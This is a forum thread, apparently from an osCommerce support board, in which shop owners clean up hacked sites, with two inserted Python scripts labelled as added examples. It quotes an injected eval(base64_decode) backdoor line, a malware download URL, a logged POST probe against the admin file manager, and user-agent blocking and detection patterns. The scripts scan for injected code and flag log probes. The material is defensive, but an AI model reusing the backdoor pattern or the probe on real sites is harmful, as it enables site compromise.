
Lary_an

VIRUS on my site - PLEASE HELP


Hi,

I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. It is hosted on Linux and the host does not assist in virus removal. The host suggested I download the whole site, check it for viruses and upload it back up. The problem is that when I do that using the latest version of NORTON I get a clean run - no viruses.

I checked every single file as much as I could to see if there is any updated code and didn't find any. The only thing I see which I don't think I had before is a new folder named www with a full copy of my site, which looks like it is being updated as soon as I update my regular site directory. I was wondering if this can be the cause of my problems.

PLEASE HELP!!!!

Any advice would be greatly appreciated!!!!!

P.S. Just got a message from my host that the www folder is a virtual folder and I shouldn't worry about it!


Norton does not check for malicious code in the source of web pages.

If you install site monitor on your site, it normally shows "most" of the files that need cleansing.

You could also read a few threads on hacked sites which discuss infected files in image and other directories.

HTH

G




Visit the link below:

How to Secure Your Site

Pay close attention to "SECURING THE ADMIN" - Yours is vulnerable.

There is a suspicious file in your root folder:

cookie_setup.php

I've seen it before.

It's normally a hack file.




 

Jim,

THANK YOU!!!!! THANK YOU!!!! THANK YOU!!!!!

This was it!

Everything works now and we are working on making the site more secure... We were not aware before of any add-ons that we could use (not good when you are a beginner and don't ask the right questions).

Thanks again!


I need urgent help... Please...

My website was recently hacked. I restored the website, godaddy.com removed some infected script file, and Google lifted the ban, but recently when I go to my website, which is divineaccessories.com, it tries to download something and my Norton picks it up as an intrusion attack, High risk, by 91.204.48.52, 80, attacker 4141.in/cvyukfmcuhnhvb.jar or 2727.in/xxxxxxxx

Please please advise, as I am not getting any traffic to my website, which is a decent website but is not getting any traffic, probably due to the virus.


Unfortunately I have the same issue. :angry: :blush: :(

With site monitor I found they left the following at the end of the file catalog/includes/header.php

<?php eval(base64_decode("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"));?>

When I installed my clean backup, it was back within 10 minutes; it seems like they used some kind of bot.

When I took my site offline for a day and then tried again, it did not come back. Of course I did various things to increase my site's security, but I'm not sure if I solved the issue and that they won't be back.

So if anyone can translate the above for me or has some specific directions I would appreciate it.
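The post above asks what the eval(base64_decode("...")) line does. The following is an added example, not code from this thread, from osCommerce or from the site monitor add-on: a small Python scanner that walks a downloaded copy of a site, finds that pattern in PHP files and prints what the hidden blob decodes to, so the payload can be read before deciding what to remove. Because the real blob was not reproduced in the post, the script builds a constructed catalog/includes tree with a harmless stand-in payload (SAMPLE_PAYLOAD and build_sample_tree are mine, not anything the hackers left).

```python
"""Find eval(base64_decode("...")) injections in a web tree and show what the
hidden blob decodes to.  Added example for this thread; not osCommerce code and
not the site monitor add-on.  The directory it scans is built as a constructed
sample so the script runs offline."""
import base64
import os
import re
import tempfile

# eval(base64_decode("...")) or eval(base64_decode('...')), tolerating whitespace.
EVAL_B64 = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)""",
    re.IGNORECASE,
)

# Constructed, harmless stand-in for the blob the post above did not reproduce.
SAMPLE_PAYLOAD = 'echo "constructed sample payload";'


def decode_payload(blob: str) -> str:
    """Decode one base64 blob; restore stripped '=' padding; never raise."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned, validate=True).decode("utf-8", "replace")
    except ValueError as exc:  # binascii.Error is a subclass of ValueError
        return f"<undecodable: {exc}>"


def find_obfuscated_evals(source: str) -> list:
    """Return [(line_number, decoded_payload), ...] for every match in a PHP source string."""
    hits = []
    for m in EVAL_B64.finditer(source):
        line_no = source.count("\n", 0, m.start()) + 1
        hits.append((line_no, decode_payload(m.group(2))))
    return hits


def scan_tree(root: str, exts=(".php", ".inc", ".phtml")) -> dict:
    """Walk root and map each affected file (path relative to root) to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_obfuscated_evals(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_sample_tree() -> str:
    """Create a constructed catalog/includes tree: one clean file, one with an injected tail."""
    root = tempfile.mkdtemp(prefix="oscscan_")
    inc = os.path.join(root, "catalog", "includes")
    os.makedirs(inc)
    clean = "<?php\n// normal header code\nrequire('configure.php');\n?>\n"
    blob = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    injected = clean + f'<?php eval(base64_decode("{blob}"));?>\n'
    with open(os.path.join(inc, "header.php"), "w", encoding="utf-8") as fh:
        fh.write(injected)
    with open(os.path.join(inc, "footer.php"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    return root


if __name__ == "__main__":
    # Point scan_tree at a downloaded copy of the real site instead of the sample.
    for path, hits in scan_tree(build_sample_tree()).items():
        for line_no, decoded in hits:
            print(f"{path}:{line_no}: eval(base64_decode(...)) decodes to: {decoded}")
```

Run it against the downloaded copy of the site rather than the live tree, and treat anything that decodes as a file to compare against a known-clean backup; the regex only catches this one obfuscation style, so it complements, rather than replaces, the file-by-file comparison the earlier replies recommend.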


The hacker has installed a back door to your insecure website. Look for and remove anomalous files and malicious code within the entire website.

Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate.

Chris




 

Yep, found some of those, and some fake PHP files too. Further, I discovered some visits from a Russian IP, 91/213/174/123


That single IP must be responsible for a lot of altered osC installations. I've lost count of the number of times it's been seen in my Apache logs now. Sadly, Russian ISPs probably couldn't care less, so I block the whole country myself.


He's tried today; wondered how much longer before he'd be back.

Awwww, he got a 403, poor soul!

91.213.174.123 - - [17/Nov/2010:11:58:13 +0000] "POST /catalog//admin/file_manager.php/login.php?action=save HTTP/1.1" 403 1245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"



My .htaccess file that is blocking countries is about 9mb long...




I don't go to quite that extent. Mine's about 250kb with the main problematic countries in it.

Another one to block as a user agent is the ZmEu script. This seems to run on either compromised servers or servers specifically set up to scan other sites for vulnerabilities.

http://www.theta.tk/wiki/ZmEu



Exactly how do you block the ZmEu script, Wayne? Do I just need to add RewriteCond %(HTTP_USER_AGENT) ^ZmEu [OR] to my list of blocked bots?

I was thinking, wouldn't it be a good idea to start a thread with an :devil: OSCOMMERCE HATE LIST? :devil: We could collect IPs of all known osCommerce hackers and use them in the IP trap or in .htaccess. Similar for the bad bots, although the IP trap has already got a nice collection.

:wub:



I think I have

RewriteCond %{HTTP_USER_AGENT} ^(.*)ZmEu(.*) [OR]

Of course they can probably use any user agent they like, but most are basically lazy and don't bother. I think I have also seen the same thing visit as "Morpheous strikes again".

Well, there are certainly many IPs that seem to visit many sites again and again.

It would not surprise me if they visit this forum quite a lot too! I wonder if any are registered users!

Wayne....
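Wayne's RewriteCond above and the 403 log line earlier in the thread are both about recognising these probes in the Apache logs. As an added example, not something posted in the thread and not osCommerce code, here is a Python script that parses combined-format access-log lines and flags the ZmEu user agent, the "Morpheous strikes again" agent Wayne mentions, and any request against admin/file_manager.php, then counts flagged requests per IP as a starting point for an IP trap or .htaccess deny list. The one line quoted from the thread is included as-is; the other three lines, the IPs 203.0.113.7 and 198.51.100.20, the two-reason "POST accepted" rule and all function names are constructed for the example.

```python
"""Flag Apache access-log lines that match the probes discussed in this thread:
the ZmEu scanner user agent and requests against the osCommerce admin file manager.
Added example, not code from the forum or from osCommerce.  Assumes the Apache
"combined" log format; the sample lines are constructed apart from the one
quoted in the thread."""
import re
from collections import Counter

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Agent strings named in the thread (ZmEu, "Morpheous strikes again"); extend as needed.
SCANNER_AGENTS = re.compile(r"ZmEu|Morpheous", re.IGNORECASE)
# The admin file manager is the script the logged POST targets (double slashes tolerated).
ADMIN_PROBE = re.compile(r"/admin/+file_manager\.php", re.IGNORECASE)

SAMPLE_LOG = [
    # quoted from the thread
    '91.213.174.123 - - [17/Nov/2010:11:58:13 +0000] "POST /catalog//admin/file_manager.php/login.php?action=save HTTP/1.1" 403 1245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"',
    # constructed lines (documentation-range IPs)
    '203.0.113.7 - - [18/Nov/2010:02:14:51 +0000] "GET /catalog/admin/ HTTP/1.1" 403 512 "-" "ZmEu"',
    '198.51.100.20 - - [18/Nov/2010:02:15:00 +0000] "GET /catalog/index.php HTTP/1.1" 200 9876 "-" "Mozilla/5.0 (compatible; examplebot)"',
    '91.213.174.123 - - [16/Nov/2010:09:01:02 +0000] "POST /catalog/admin/file_manager.php?action=save HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def parse_line(line: str):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Reasons this request looks like a probe (empty list means nothing matched)."""
    reasons = []
    if SCANNER_AGENTS.search(entry["agent"]):
        reasons.append("scanner user agent")
    if ADMIN_PROBE.search(entry["path"]):
        reasons.append("admin file_manager.php probe")
        # A 2xx on a POST means the file manager actually ran, so files may have been written.
        if entry["method"] == "POST" and entry["status"].startswith("2"):
            reasons.append("POST accepted: inspect the file manager directory for new files")
    return reasons


def scan_log(lines) -> list:
    """Return [(entry, reasons), ...] for every line that triggered at least one reason."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            hits.append((entry, reasons))
    return hits


def offending_ips(hits) -> Counter:
    """Count flagged requests per client IP, a starting point for a deny list."""
    return Counter(entry["ip"] for entry, _ in hits)


if __name__ == "__main__":
    # For real data: scan_log(open("/var/log/apache2/access.log")) or the host's log path.
    flagged = scan_log(SAMPLE_LOG)
    for entry, reasons in flagged:
        print(f'{entry["ip"]} {entry["method"]} {entry["path"]} -> {entry["status"]}: {", ".join(reasons)}')
    print("flagged requests per IP:", dict(offending_ips(flagged)))
```

The per-IP counts are the candidates for the IP trap or for .htaccess deny rules; a 2xx on a POST to file_manager.php from an address you do not recognise is the one to follow up first, because that is the request that can write files into the site.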
